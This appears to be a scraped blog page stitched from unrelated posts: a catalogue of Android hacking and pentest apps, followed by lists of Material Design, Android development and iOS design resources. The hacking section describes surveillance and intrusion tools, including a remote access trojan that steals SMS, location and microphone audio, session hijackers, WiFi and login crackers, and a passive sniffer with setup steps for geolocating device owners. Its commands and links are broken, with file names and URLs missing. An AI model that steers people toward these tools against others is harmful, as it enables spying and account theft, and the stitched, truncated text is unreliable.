Security researchers have long maintained that malware is a problem on Android, the Google operating system that’s on 80% of the world’s smartphones. In extreme cases, hackers with malicious intent can do much more than send premium text messages.  In this post, we will see various apps for web application penetration testing, network penetration testing, sniffing, networking hacking and Android apps penetration testing.


Hackode : The hacker’s Toolbox is an application for penetration tester, Ethical hackers, IT administrator and Cyber security professional to perform different tasks like reconnaissance, scanning performing exploits etc.

This Application contains different tools like:

  • Reconnaissance
  • Google Hacking
  • Google Dorks
  • Whois
  • Scanning
  • Ping
  • Traceroute
  • DNS lookup
  • IP
  • MX Records
  • DNS Dig
  • Exploits
  • Security Rss Feed

This Application is still in beta version

Source && Download at:


Remote Administration Tool for Android. The name Androrat is a mix of Android and RAT (Remote Access Tool).

Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.

All the available functionalities are

  • Get contacts (and all theirs informations)
  • Get call logs
  • Get all messages
  • Location by GPS/Network
  • Monitoring received messages in live
  • Monitoring phone state in live (call received, call sent, call missed..)
  • Take a picture from the camera
  • Stream sound from microphone (or other sources..)
  • Streaming video (for activity based client only)
  • Do a toast
  • Send a text message
  • Give call
  • Open an URL in the default browser
  • Do vibrate the phone

Source && Download at:


The goal of this project is to aide analysts and reverse engineers to visualize compiled Android packages and their corresponding DEX code. APKInspector provides both analysis functions and graphic features for the users to gain deep insight into the malicious apps:

  • CFG
  • Call Graph
  • Static Instrumentation
  • Permission Analysis
  • Dalvik codes
  • Smali codes
  • Java codes
  • APK Information

Source && Download at:


DroidBox is developed to offer dynamic analysis of Android applications. The following information is shown in the results, generated when analysis is ended:

  • Hashes for the analyzed package
  • Incoming/outgoing network data
  • File read and write operations
  • Started services and loaded classes through DexClassLoader
  • Information leaks via the network, file and SMS
  • Circumvented permissions
  • Cryptography operations performed using Android API
  • Listing broadcast receivers
  • Sent SMS and phone calls

Source && Download at:


zANTI is a comprehensive network diagnostics toolkit that enables complex audits and penetration tests at the push of a button. It provides cloud-based reporting that walks you through simple guidelines to ensure network safety.

These various pentest options include:

  • Network Map
  • Port Discovery
  • Packet Manipulation
  • Sniffer
  • MITM (Man in the Middle filters)
  • DoS (Pentest DoS vulnerabilities)
  • Password Complexity Audit
  • Penetrate CSE to check server/desktop vulnerabilty

Source && Download at:

Droid Sheep:

DroidSheep is a simple Android tool for web session hijacking (sidejacking). It listens for HTTP packets sent via a wireless (802.11) network connection and extracts the session id from these packets in order to reuse them.

DroidSheep can capture sessions using the libpcap library and supports: OPEN Networks WEP encrypted networks WPA and WPA2 encrypted networks (PSK only)

DroidSheep is not intended to steal identities or endamage anybody, but to show the weak security of non-ssl webservices

Source && Download at:


dSploit is an Android network analysis and penetration suite which aims to offer to IT security experts/geeks the most complete and advanced professional toolkit to perform network security assessments on a mobile device.


  • WiFi Cracking
  • RouterPWN
  • Trace
  • Port Scanner
  • Inspector
  • Vulnerability finder
  • Login cracker
  • Packet forger
  • Man in the middle
  • Simple sniff
  • Password sniff
  • Session Hijacker
  • Kill connections
  • Redirect
  • Replace images
  • Replace videos
  • Script injector
  • Custom filter

Source && Download at:

AppUse – Android Pentest Platform Unified Standalone Environment:

AppUse Virtual Machine, developed by AppSec Labs, is a unique (and free) system, a platform for mobile application security testing in the android environment, and it includes unique custom-made tools.


  •  New Application Data Section
  •  Tree-view of the application’s folder/file structure
  •  Ability to pull files
  •  Ability to view files
  •  Ability to edit files
  •  Ability to extract databases
  •  Dynamic proxy managed via the Dashboard
  •  New application-reversing features
  •  Updated ReFrameworker tool
  •  Dynamic indicator for Android device status
  •  Bugs and functionality fixes

Source && Download at:

Shark for Root:

Traffic sniffer, works on 3G and WiFi (works on FroYo tethered mode too). To open dump use WireShark or similar software, for preview dump on phone use Shark Reader. Based on tcpdump. Please leave comments/send e-mail if you have any problems/suggestions.

Source && Download at:

Android Device Testing Framework

The Android Device Testing Framework (“dtf”) is a data collection and analysis framework to help individuals answer the question: “Where are the vulnerabilities on this mobile device?” Dtf provides a modular approach and built-in APIs that allows testers to quickly create scripts to interact with their Android devices. The default download of dtf comes with multiple modules that allow testers to obtain information from their Android device, process this information into databases, and then start searching for vulnerabilities (all without requiring root privileges). These modules help you focus on changes made to AOSP components such as applications, frameworks, system services, as well as lower-level components such as binaries, libraries, and device drivers. In addition, you’ll be able to analyze new functionality implemented by the OEMs and other parties to find vulnerabilities.

Source && Download at:


drozer (formerly Mercury) is the leading security testing framework for Android.

drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps’ IPC endpoints and the underlying OS.

drozer provides tools to help you use, share and understand public Android exploits. It helps you to deploy a drozer Agent to a device through exploitation or social engineering. Using weasel (MWR’s advanced exploitation payload) drozer is able to maximise the permissions available to it by installing a full agent, injecting a limited agent into a running process, or connecting a reverse shell to act as a Remote Access Tool (RAT).

Source && Download at:


Neopwn is an advanced penetration testing and radio frequency auditing platform designed to run on mobile phones and tablets. We were the first to ever release a security auditing distribution for a mobile phone, and we continue to push the envelope in supporting the latest bleeding-edge tools and hardware.

Several options exist for local and remote control of the Neopwn system, including:

  • Android-based control panel application for system management
  • Desktop interface via VNC, for full X windows programs
  • Shell access with native Android terminal emulation applications
  • Quick application access with native Android desktop icon launchers
  • Remote access through VPN and SSH

Source && Download at:


Have you ever looked at your Android applications and wondered if they are watching you as well? Whether it’s a bandwidth-hogging app, aggressive adware or even malware, it would be interesting to know if they are doing more than what they are supposed to and if your personal information is exposed. Is there really a way to automatically evaluate all your apps – even hundreds of them – to harvest their behavioral data, analyze their run pattern, and at the same time provide an interface to facilitate a vast majority of evolving security tests with most practical solutions?

Android Security Evaluation Framework (ASEF) performs this analysis while alerting you about other possible issues. It will make you aware of unusual activities of your apps, will expose vulnerable components and help narrow down suspicious apps for further manual research. ASEF is an Open Source tool for scanning Android Devices for security evaluation. Users will gain access to security aspects of android apps by using this tool with its default settings

Source && Download at:


Reverse engineering, Malware and goodware analysis of Android applications … and more


  • Map and manipulate DEX/ODEX/APK/AXML/ARSC format into full Python objects,
  • Diassemble/Decompilation/Modification of DEX/ODEX/APK format,
  • Decompilation with the first native (directly from dalvik bytecodes to java source codes) dalvik decompiler (DAD),
  • Access to the static analysis of the code (basic blocks, instructions, permissions (with database from …) and create your own static analysis tool,
  • Analysis a bunch of android apps,
  • Analysis with ipython/Sublime Text Editor,
  • Diffing of android applications,
  • Measure the efficiency of obfuscators (proguard, …),
  • Determine if your application has been pirated (plagiarism/similarities/rip-off indicator),
  • Check if an android application is present in a database (malwares, goodwares ?),
  • Open source database of android malware (this opensource database is done on my free time, of course my free time is limited, so if you want to help, you are welcome !),
  • Detection of ad/open source librairies (WIP),
  • Risk indicator of malicious application,
  • Reverse engineering of applications (goodwares, malwares),
  • Transform Android’s binary xml (like AndroidManifest.xml) into classic xml,
  • Visualize your application with gephi (gexf format), or with cytoscape (xgmml format), or PNG/DOT output,
  • Integration with external decompilers (JAD+dex2jar/DED/…)
  • ….

Source && Download at:


Nicknamed as the “Smartphone Version of Backtrack”, Revenssis Penetration Suite is a set of all the useful types of tools used in Computer and Web Application security. Tools available in it include: Web App scanners, Encode/Decode & Hashing tools, Vulnerability Research Lab, Forensics Lab, plus the must-have utilities (Shell, SSH, DNS/WHOIS Lookup, Traceroute, Port Scanner, Spam DB Lookup, Netstat… etc). All these fitting in an application approx. 10MB (post installation).


  • All Web Vulnerability Scanners including:
  • SQL injection scanner
  • XSS scanner
  • DDOS scanner
  • CSRF scanner
  • SSL misconfiguration scanner
  • Remote and Local File Inclusion (RFI/LFI) scanners
  • Useful utilities such as:
  • WHOIS lookup, IP finder, Shell, SSH, Blacklist lookup tool, Ping tool,
  • Forensic tools (in imlementation) such as malware analyzers, hash crackers, network sniffer, ZIP/RAR password finder, social engineering toolset, reverse engineering tool
  • Vulnerability research lab (sources include: Shodan vulnerability search engine, ExploitSearch, Exploit DB, OSVDB and NVD NIST
  • Self scan and Defence tools for your Android phone against vulnerabilities
  • Connectivity Security Tools for Bluetooth, Wifi and Internet. (NFC, Wifi Direct and USB in implementation)

Source && Download at:

SPF – Smartphone Pentest Framework

The product of a DARPA Cyber Fast Track grant, the Smartphone Pentest Framework is an open source security tool, designed to aid in assessing the security posture of smartphones in an environment. SPF Version 0.1 contains remote attacks, client side attacks, social engineering attacks, and post exploitation, targeting smartphone devices.

Source && Download at:


Bugtroid is an innovative tool developed by the team of Bugtraq-Team. The main features of this apk, is that it has more than 200 Android and Linux tools (PRO) for pentesting and forensics through smarthphone or tablet.

Source && Download at:

OWASP Droid Fusion

OWASP Droid Fusion is a platform for android mobile or any other mobile for doing Malware Analysis, Development, Application Pentesting and Forensics. You can use it in any mobile security research, and if you have Droid Fusion, you don’t need to worry about finding tools. There are more then 60 tools and scripts and it is free.

Source && Download at:

Android Device Testing Framework (“dtf”)

Android Device Testing Framework

The Android Device Testing Framework (“dtf”) is a data collection and analysis framework to help individuals answer the question: “Where are the vulnerabilities on this mobile device?” Dtf provides a modular approach and built-in APIs that allows testers to quickly create scripts to interact with their Android devices. The default download of dtf comes with multiple modules that allow testers to obtain information from their Android device, process this information into databases, and then start searching for vulnerabilities (all without requiring root privileges). These modules help you focus on changes made to AOSP components such as applications, frameworks, system services, as well as lower-level components such as binaries, libraries, and device drivers. In addition, you’ll be able to analyze new functionality implemented by the OEMs and other parties to find vulnerabilities.


To use dtf, you will need at least the following:

  • JRE 1.7
  • Python 2.6 or higher
  • A true Bash shell (no Dash!!!), with general purpose Linux utilities (sed, awk, etc.)
  • sqlite3
  • The Android SDK

Downloading, Configuring, and Installing

First, you’ll want to download the core component of dtf from GitHub:

user@testing$ git clone dtf/

You’ll need to add dtf to your path, as well as the Android SDK tools (so that dtf knows about “adb” and “aapt”). If you want to use the auto completion features of dtf, you have a few choices. You can source the file “” in your “.bashrc”, copy “ to “/etc/bash_completion.d/” (if you are already sourcing this in your “.bashrc”), or just run:

user@testing$ . dtf/

To confirm dtf is working, try the command:

user@testing$ dtf -h

If you see the dtf help screen with no errors, you are good to go!

Getting Modules

Dtf is just a framework. Without installing actual content, it doesn’t do anything! The modules that I use are available below, depending on your needs. For first time users, I recommend grabbing the core module content “” and the “” for the version(s) of Android you plan on testing (you’ll need the aosp-data-x packages for using some modules).


More information can be found at: and at:

iSniff GPS – Passive sniffing tool for capturing and visualising WiFi location data disclosed by iOS devices

iSniff GPS

iSniff GPS passively sniffs for SSID probes, ARPs and MDNS (Bonjour) packets broadcast by nearby iPhones, iPads and other wireless devices. The aim is to collect data which can be used to identify each device and determine previous geographical locations, based solely on information each device discloses about previously joined WiFi networks.

iOS devices transmit ARPs which sometimes contain MAC addresses (BSSIDs) of previously joined WiFi networks. iSniff GPS captures these ARPs and submits MAC addresses to Apple’s WiFi location service (masquerading as an iOS device) to obtain GPS coordinates for a given BSSID. If only SSID probes have been captured for a particular device, iSniff GPS can query network names on and visualise possible locations.

By geo-locating multiple SSIDs and WiFi router MAC addresses, it is possible to determine where a device (and by implication its owner) is likely to have been.



iSniff GPS contains 2 major components and further python modules:

  • uses Scapy to extract data from a live capture or pcap file and inserts it into a database (iSniff_GPS.sqlite3 by default).
  • A Django web application provides a browser-based interface to view and analyse the data collected. This includes views of all detected devices and the SSIDs / BSSIDs each has probed for, a view by network, Google Maps views for visualising possible locations of a given BSSID or SSID, and a pie chart view showing a breakdown of the most popular device manufacturers based on client MAC address Ethernet OUIs.
  • provides a QueryBSSID() function which looks up a given BSSID (AP MAC address) on Apple’s WiFi location service. It will return the coordinates of the MAC queried for and usually an additional 400 nearby BSSIDs and their coordinates.
  • provides a getLocation() function for querying a given SSID on the database and returns GPS coordinates. It must be configured with a valid auth cookie. Please respect the ToS in using this module.


To use the web interface:

  1. Install or update required Python modules by running pip install -U -r requirements.txt.
  2. Initialise an empty database by running ./ syncdb.
  3. Start the web interface by running ./ runserver

To sniff wifi traffic:

  1. Install Scapy
  2. Import data from a wifi pcap capture by running ./ -r <chan11.pcap>
  3. For live capture, bring up a wifi interface in monitor mode (usually mon0) so that airodump-ng shows traffic.
  4. Start live sniffing with ./ -i mon0.


iSniff GPS was developed on a Ubuntu 12.04 (32-bit) VM with Python 2.7.3, Django 1.5.4 and Scapy 2.2.0-dev. The web interface code has been updated and tested with Django 1.7.1 running on Mac OS X Yosemite with Python 2.7.8. Network sniffing has not been tested on Mac OS X.

More information can be found at:

35 Great Resources for Google Material Design

Google introduced the new design language “Material design” at the Google I/O conference on 25th June 2014. It focuses on grid based layouts, padding, floating action buttons, responsive transitions, depth effects like lightning and shadows. Unlike real paper, material design can expand and reform intelligently. With the addition of tactile surfaces, fluid motion and bold graphic design, it allows designers and developers to build more colorful, flexible and compelling application for web, Android and Chrome OS.

If you are finding a way to explore Material design and its usage in your project, here are 34 helpful resources which will help you to make your application/web more attractive.

35. Animated Tabs

Animated Tabs

Polymer app without canvas and polymer. You can use only CSS3 and pure JavaScript.

34. Modern Loader

Modern Loader

A modern Google spinning loader in pure CSS, animating through four colors.

33. Material Design Preloader

Material Design Preloader

A jQuery plugin that recreates the material design preloader as shown above.

32. Material Design Navigation

Material Design Navigation

The pages slide to reveal a clean, simple and smooth navigation.

31. Switch Theme

Switch Theme

A simple and elegant switch theme from Google material design (by Zhoolego).

30. PC Icons

PC Icons

A few material design icons for PCs.

29. Material Shadows


The authentic design shadows without web components, designed by Ben Strahan.

28. Menu CSS

Menu CSS

material design menu with amazing hover effect. Just copy the given CSS and HTML code to your project.

27. Radio Input

Radio Input

This is the custom radio input (CSS only), designed by Christian Hall.

26. The Morphing Icons


The morphing icons are designed by Alberto Bonvicin. Currently, it cycles through the radios randomly or you can change to cycle in order, starting with checked elements.

25. Material Design Form

Material Design Form

A simple and quick material design login form with ripple effect, designed by Josh Adamous.

24. Animation Timing

animation timing

A smart and beautiful animation timing based on material design, created by Sergey Kupletsky.

23. Material Design Buttons

Material Design Buttons

The script automatically (written by Michaela) adds the material design effect to elements with “material design” class. Just add the preferred color as “data-color” attribute. You can also use it on div with images.

22. Product Icon Anatomy


This is animated version of the product icon anatomy guideline from Google material design, created by Jovie Brett.

21. Material Palette

Material Palette

Select your favorite color(s) and get your material design color palette (along with the preview).

20. Material Icons Deconstruction

Material Icons Deconstruction

This is finished clone of delightful details. You can build these kinds of deconstruction just by using HTML and CSS. Users need to click on each section to toggle between icons.

19. Material Interaction

Material Interaction

The page shows the interactive experiences of Material design principle.

18. Ripple Click Effect

Ripple Click Effect

This is kind of click effect which includes an ink-drop like element that moves out rapidly from the position where the user clicks/taps. The simple logic here is to create circles (with smooth transition) at click coordinates behind the links.

17. Hover and Click Effect

Hover and Click Effect

Yet another hover and click effect, in addition with a mixture of different colors which makes it more appealing.

16. The Tiles

The Tiles

The Material design CSS based tiles, created by Sergey Kupletsky.

15. Material Design Icons

Material Design Icons

These are official open source icons featured in the Google material design specification. It includes SVG, PNG and hi-dpi versions of all icons in 24px & 48px.

14. Free Sketch, Templates and Icons

Free Sketch, Templates and Icons

This is a quick start sketch template that includes 424 Android L icons, mobile, tablet and desktop layouts and all the polymer project web component elements.

13. Material Design Icon Expanded

Material Design Icon Expanded

A huge collection that includes over 1400 icons in SVG & PNG format, available in several sizes.

12. Material Design for Bootstrap

Material Design for Bootstrap

It’s a theme for Bootstrap 3 that lets you use the Google material design in your favorite front-end framework. Just include the theme after CSS and include JavaScript at the end of your code (before </body> tag).

11. Material Design for AngularJS

Material Design for AngularJS

It’s a specification for a unified system of motion, visual and interaction design for all devices. It consists of lightweight and clean AngularJS native user interface elements that can be used in single page applications.

10. Lollipop GUI Kit

Lollipop GUI Kit

This is Android’s Lollipop xxhdpi graphical user interface kit designed by Sandip D.

9. Lollipop GUI -2

Lollipop GUI -2

This is Android Lollipop 5.0 PSD with all screens including splash, call, notification, inbox, email, manage file and contact feed screen.

8. Material UI kit

Material UI kit

All new material UI kit (HTML + CSS), designed by UltraLinx. Here’s the demo.

7. Lollipop Material Design UI kit

Lollipop Material Design UI kit

This is the Android Lollipop Material design UI kit for sketch, designed by Ivan Bjelajac. The use cases are based on common UX flows in Android app.

6. Material Design Hamburger

Material Design Hamburger

Android’s material design hamburger is built in CSS that currently supports the latest version of all major browsers. Just download the latest release and include the CSS & JS files from the dist folder where desired within your project.

5. Android Music App

Android Music App

Wanna create a music app? The design is ready for you. It includes home screen, login, my music, contacts, sidebar, top playlist, news feed, player, album view and user playlist screen. Available for $15.

4. Materialize


Materialize is the modern, responsive front-end framework based on material design. It includes tons of gorgeous elements and components like badges, buttons, cards, preloader, icons, colors, grid, form, table, media, shadow, typography and much more.

3. LumX


LumX is the responsive front-end framework based on Angular JS and material design specification. It is built on Google guideline, respecting metrics in pixel perfect way.

2. Material UI

Material UI

It’s a CSS framework and a group of react components that implement Google’s material design. For better understanding start with the React library before diving into material UI.

1. Polymer


Polymer is a large library that uses latest web technology to let you create HTML elements. You can build anything from a small button to a complete application as an encapsulated, reusable element that works on all devices.

40+ Useful Tools for Developing Android Apps

You don’t need to spend thousands of dollars and months of work to enter the mobile market. If you want to create an app for your business, blog, product or service, all you need is knowledge of Java and right combination of tools. Today, thousands of software/web tools are available out there to get you started. We’ve made a small attempt to minimize your development efforts. This article includes everything you need to develop, test, monetize, analyze and enhance your app. No matter who you are or on what scale you wanna develop, these tools will help you build more polished Android apps with the biggest chance of meeting your target. Here we go…

Note: You need to buy free version tools to unlock all advanced features.

41. JSONView


JSONView is a small Firefox extension that lets you view JSON document in the browser. The document is well formatted, highlighted and objects and arrays can be collapsed.

40. Android GUI Set

Android GUI set

This is free Android GUI set including Photoshop files. It consists of main menu, keyboard, status bar, browser, screen label, slider, contact list, circle buttons, radio, option panel and many more interfaces.

39. XAppDbg


XAppDbg is an app development tool (by Sony) which is used to change parameters of code during runtime. This can save you a lot of time, since you don’t have to test/run your app for each tiny change.
Price: Free

38. Android Holo Colors Generator

Android Holo Colors Generator

This holo color creator allows you to create beautiful Android components like spinner/editext with your own colors for your apps. It will generate necessary patch assets, XML drawables and styles which you can copy direct into your project.
Price: Free

37. Android Action Bar Style Generator

Android Action Bar Style Generator

This action bar generator allows you to create attractive custom action bar style for your Android app. It will create necessary patch assets, styles and XML drawables that you can apply direct to your application.
Price: Free

36. TestObject


TestObject helps Android developers make test scenarios, record them and execute them. It gives you the facility to access over 120 real Android devices right from your browser. Errors are detected automatically, like security exception, illegal state, null pointer etc.
Price: Starting at 89 per month.

35. Bizness Apps

Bizness Apps

This is an affordable app maker for simple and small businesses. Select the pre-designed template or start from scratch. You can design and implement (without coding) your own artistic style with their amazing features set. Publish and promote your app and track your user base plus return on investment.
Price: Starts at $29 per month.

34. Splunk


Splunk monitors the performance and usage of your apps. Just one line installation and you’ll receive complete error information, event analytics, real time transactions and network monitoring reports.
Price: Free for apps with 1 thousand monthly active users.

33. Ubertesters


Ubertesters is a complete mobile app testing tool that lets you organize, execute, control and monitor your app beta testing process. It supports in-app bug editing, over-the-air (OTA) app distribution, real time monitoring and integration with external bug tracking system.
Price: Free for up to 5 users.

32. Android Layout Binder

Android Layout Binder

Android Layout Binder converts your XML layouts into a set of decelerations. You need to enter the prefix of your field, select the mode and enter the Layout XML.
Price: Free

31. Jsonstub


Jsonstub allows you to fake (mockup) the back-end while you develop the front-end. All you need is your favorite JavaScript framework or mobile development environment to start building apps. It can be used simultaneously by those who work on the client and those who work on the services.
Price: Free

  1. Mobile Dev HQ

Mobile Dev HQ

It’s an SEO (Search engine optimization) for mobile apps. Their data provide the best keywords based on relevance, difficulty and search volume. You will be able to track your search ranking positions for specific keywords.
Price: Free for tracking up to 10 apps.

29. APKAnalyser


APKAnalyser is static and virtual analysis tool that can be used view app architecture, dependencies, API references and disassemble bytecodes in Android apps. It allows you to explore packages, classes, methods, fields, decode Android XML files and modify APK file.
Price: Free

28. GitEye


GitEye (by CollabNet) combines simple and powerful graphical Git client with central visibility into essential developer tasks like agile planning, defect tracking, code reviews and build tools. You can integrate it with CloudForge, TeamForge, Jira, BugZilla, GitHub and more.
Price: Starts at $350 per month.

27. Push IO

Push IO

The Oracle Push Cloud Service is an enterprise class push notification platform designed to meet the needs of modern marketers and world’s best apps. It provides lightweight SDK, powerful APIs and Web Dashboard to target users based on geo-location, preferences and device metrics.
Price: As per the project.

26. LiveCode


LiveCode is English-like language for developing Android and iPhone apps. Here you can develop live prototypes that use the full capabilities of mobile devices and deploy to whatever platform your customers need. Moreover, it is packed with numerous tutorials to help you along the way.
Price: Starts at $299 per year.



GENWI is smartphone and tablet publishing platform that allows you to create and manage your presence on all popular mobile devices. It delivers rich graphics, images, videos, audio, interaction and revenue generating capabilities for businesses like in-app subscription, coupons, ads etc.
Price: As per the project.

24. Applause


Applause is wild testing platform that provides the feedback from testers and users. It reports in-app bugs, automatic crashes and in-app user feedback. Moreover, the Applause SDK automatically keeps your testers up to date with the latest build of your app, ensuring they all are focused on the version that matters the most.
Price: As per the project.

23. BitBucket


BitBucket is a web-based hosting service for project that uses GIT OR MERCURIAL. It allows you to work as a team, pull requests, review codes and share unlimited private repositories.
Price: Free for 5 users.

22. App Icon Sizes

App Icon Sizes

At some stage of mobile app development process, you will need splash screens, icons and default Android graphics. This need is fulfilled by AppIconSizes. It generates all necessary files from single image and creates the correct folder structure which Android requires.
Price: Free (no ads, no watermarks)

21. Android Icon Generator

Android Icon Generator

This icon generator allows you to easily generate icons from existing source clipart, text and images. Here you can create launcher icons, notification icons, generic icons, action bar and tab icons.
Price: Free

20. IBM Mobile Push Notification

IBM Mobile Push Notification

IBM mobile push notification offers a flexible and easy to use environment for building notification campaigns which engage mobile app users at the optimal time and location. You can target communications according to your business rules, customer behavior, customer relationship management and current segmentation.
Price: Based on the project.

19. Spoon


Spoon distributes the instrumentation tests execution and shows the results in a meaningful way. It is packed with a device view that outlines the results of each test one a single device and a test view which shows the results of a single test across all of the devices it was executed on.
Price: Free

18. Kendo UI

Kendo UI

Kendo UI includes everything for building mobile and web apps with HTML5 and JavaScript. Over 70 jQuery-based UI widgets are packed in one tool. Kendo also supports Angular JS integration, mobile controls, Bootstrap and offline data solution.
Price: $699

  1. Cenzic


Cenzic Mobile is a security service to protect the data on the latest online front. It uses Hailstorm technology to analyze mobile application and detect vulnerabilities in critical areas such as input validation authentication mechanism, session security and encryption usage.
Price: As per the project.

16. MyAppBuilder


MyAppBuilder uses phone gap framework for creating apps using standardized web API’s of the platform you like. The apps are created using web technologies like JavaScript, HTML and CSS. You can build apps for author/publisher, real estate, restaurants, digital goods, bands, sports, news, car dealership, nonprofits, tickets, events and more.
Price: Starts at $9 per month.

15. Pubnub


Pubnub is super-fast cloud hosted messaging service for real time apps. Send and listen to events within your app using simple publish and subscribe API calls. You can stream, store, sync, protect and manage data to any device, anywhere.
Price: Free for up to 1 million messages per month.

14. SwebApps


SwebApps provides a platform to create web apps and native Android apps. It is built to handle small as well as large scale applications. You can add photos, videos, audio files, documents, event details and there are categories and subcategories for all organizational freaks.
Price: Starts at $19 per month.

13. Sencha Touch

Sencha Touch

Sencha Touch provides JavaScript & HTML framework and development tools to build complete touch based apps in a single integrated package. It gives designers the ability to prototype applications with pixel perfect clarity, and developers a perfect code editor and interactive charts.
Price: $3855

12. Appboy


Appboy is a web tool that allows you to monitor and measure CRM, user engagement, analytics and more, in real time. You can create a relevant experience for each user and vary your outreach via in-app messages, push email and industry first news feed.
Price: Starts at $10 per month

11. ShoutEm


ShoutEm is simple and powerful mobile app creator that has everything you need to build amazing apps, without any coding skills. It is packed with drag-drop interface, CMS, analytics, monetization and publish/preview tools. Moreover, you get unlimited support, maintenance and free updates.
Price: Starts at $19.90 per month.

10. Fluid UI

Fluid UI

Fluid UI is web-based mobile prototyping tool that lets you rapidly assemble native looking mockups. You can select from 3500+ mobile, tablet and wearable widgets or upload your own image to get pixel perfect look. Moreover, you can preview/test your mockup directly in your browser and share it with clients and stakeholders.
Price: Starts at $10 per month.

9. Appcelerator


Appcelerator is an open, cloud based enterprise platform creating, delivering and analyzing your mobile app. Write an app (all in JavaScript) and it will provide you live prototyping, code optimization and full automated testing to deliver high performance app.
Price: Free

8. PhoneGap


PhoneGap allows you to easily create apps using web technologies like CSS, HTML and JavaScript. You can develop locally and then see the changes instantly on mobile device with their cross platform app. Your app is compiled in the cloud.
Price: Free/Open Source

7. Proto


Proto allows you to build fully interactive high fidelity prototypes that look and work exactly your app should (No coding skills needed). With Proto, you can test the prototype on actual device and feel the app experience with rich animations, interactions and gestures.
Price: Starts at $24 per month.

6. Mobile Roadie

Mobile Roadie

Mobile Roadie is a CMS that helps you build customizable apps with ease and update them on the fly. This cloud platform supports geo-targeted marketing campaigns, user analytics, push notification, any time content updates and packed with various engagement tools.
Price: Starts at $149 per month.

5. Parse


Parse is a complete mobile app platform that allows you to focus on creating unique apps (on any platform). It takes care of almost everything you apps need, from the core to analytics and push notification, localized documentation to crash reporting.
Price: Free for 1 concurrent job

4. Apiary


Build beautiful and clean APIs with Apiary. It will save you a lot of time for back-end and front-end discussion. It is packed with some great features like instant API mock, collaborative design, integrated code samples, generated documentation, debugging and automated testing tools.
Price: Free for 1 user.

3. GameSalad Creator

GameSalad Creator

This is the fastest game creation engine (integrated with physics engine) that lets you design and test your own game (No coding skills required). The software has a visual drag-drop interface and a deep behavior library to make game designing process fast and easy. It also shows you real and vital stats of your game performance.
Price: Free

2. Appmakr


Appmakr provides the quickest way to create a mobile app for your blog, business or community group using drag drop feature (No coding skills required). You can easily add photos, videos, maps, social feeds and more. When done, post it on Google Play and start analyzing and monetizing your app.
Price: Free

1. Genymotion


We all know starting the emulator and running an app is a slow and tedious process. Genymotion is designed to solve this problem, by providing hardware accelerated Android emulator. It supports various Android API levels and work seamlessly with Android Studio. Genymotion uses x86 architecture virtualization and packed with 20 pre-configured devices.
Price: Free for personal use.

30+ Useful Resources for every iOS developer

No matter how expert you are, sometimes you need a few resources to develop a successful application. There are plenty of options at your fingertips and it’s totally up to you what you select to create your app. Few developers rely on complete heavy toolkit while others would like to look for only specific components and features they really need in application. Either way, we have compiled a list of few latest resources which might be useful for every iOS developer. Select according to your need and don’t let your app get lost in the dark corners of the App Store.
All resources are free unless specified. P.S: The list doesn’t contain prototyping tools. 

31. Minniebox


Minniebox is sketch file designed during the London Dropbox Hackathon. You are free to use this file however you like.

30. Call Screen Icons

Call Screen Icons

This is a set of call screen icons of iOS 7/8, brought to you by Sarah Li.

29. iOS 8 GUI for Sketch

iOS 8 GUI for Sketch

This is a free sketch file of GUI elements with layered, well-structured and full of editable shape layer. You can use it either for mocking up apps or use it to concept ideas or create custom interface elements.

28. iOS 8 UI kit

iOS 8 UI kit

free sketch resource (designed by Rafael Condeb) that contains Teehan + Lax built-in UI kit to iOS 8 and some new elements.

27. Lock Screen Concept

Lock Screen Concept

This iOS lock screen concept (sketch file) is designed by Igor Leygerman.

26. Blop Effect


An amazing after effect designed by Jelio Dimitrov for FourPlus Studio.

25. Apple Bluetooth keyboard

Apple Bluetooth keyboard

The Apple Bluetooth keyboard sketch file is designed by Luis Herrero.

24. Pattern Library

Pattern Library

The collection of beautiful and fancy pattern for backgrounds.

23. Polygon Backgrounds

Polygon Backgrounds

The free low polygonal background textures available in 3000*2000 px resolution.

22. SleepUI


A UI to display your sleep pattern, designed by Daniel Klopper.

21. Colorful Gradient

Colorful Gradient

This is a neat gallery of colorful gradient randomly generated by machine. Here you can get over 10,000 samples.

Read: 30+ Background and Pattern Generators (online) for Designer

20. Contact Icon

Contact Icon

This Contact Icon sketch file was designed by Stefano Fois.

19. Apple Map Icon

Apple Map Icon

The collection of all Apple map icons (sketch file), brought to you by Lucas Raggers.

18. Realistic iOS App Icons

Realistic iOS App Icons

The collection of realistic iOS app icons, designed by ramotion.

17. iOS 8 Icon

iOS 8 Icon

This is an after effect project file of iOS 8 icon brought to you by Jelio Dimitrov.

16. iPhone 6+ UI Kit

iPhone 6+ UI Kit

The big UI kit for iOS 8 iPhone 6 plus, designed by Kapil G. Available in PSD format.

15. Jellycons


This is a set of 100 free iOS 8 icons, by Ben Bate.

14. Animated Tab Bar Icons

Animated Tab bar icons

Animated Tab Bar is a swift module for adding animation to tabbar items. It has inbuilt set of animations which you can use/select according to your need.

13. To-do Checklist

To-do Checklist

To-do Checklist app interface is a free sketch file created by Atul Gawande.

12. Storex


Storex is a shopping app kit for iPhone designed by Ozan Oztaskiran. It is packed with all app screens and hundreds of components including my account, order status, sign up, empty cart, payment information, checkout, FAQ, store locator and more.

11. Dev_Tones


This is a big collection of user interface sounds which you can for your app. The pro version is available at $35.

10. Squadlance Concept

Squadlance Concept

This is a Squadlance Concept dashboard (designed by Virgil Pana), an app that allows project managers to build and manage teams of freelancers.

Read: 20+ Useful Online Tools to Create Charts and Graphs

9. Capture


Capture is a complete iOS photo app kit, specially designed for taking panorama. The sketch file is created by Ismail.

8. Apple Watch GUI Kit

Apple Watch GUI Kit

Get 40+ Apple watch screens for free, built for 38mm screen. The full set (designed by Jan Losert) comes in .Sketch and .PSD formats.

7. TestFlight


TestFlight is beta testing software that allows you to invite users to test your iOS application before you upload them on App Store. You can invite up to thousand testers via email address.

Read: 19 A/B Testing Tools to Improve Your Conversion Rate

6. Pixelmator for iPad

Pixelmator for iPad

Pixelmator is a powerful image editor that allows you to create, edit and enhance your images. You can work seamlessly between Mac and iPad.

5. Bootstrap Vector UI Kit

Bootstrap Vector UI Kit

This kit contains all Bootstrap 3 UI controls in vector format. All elements are already sliced, HTML coded, styled and ready to use. It includes PDF, illustrator and sketch files.

Read: 24 Useful Bootstrap UI Editors for Developers

4. Stack of Cards

Stack of Cards

The Stack of Cards was designed by Wayne Dahlberg. It is available in .PSD and .Sketch formats.

3. Crush Surf Shop

Crush Surf Shop

Crush surf shop is a mobile store template for sketch app, designed by Paul Hershey. The file size is 137 MB.

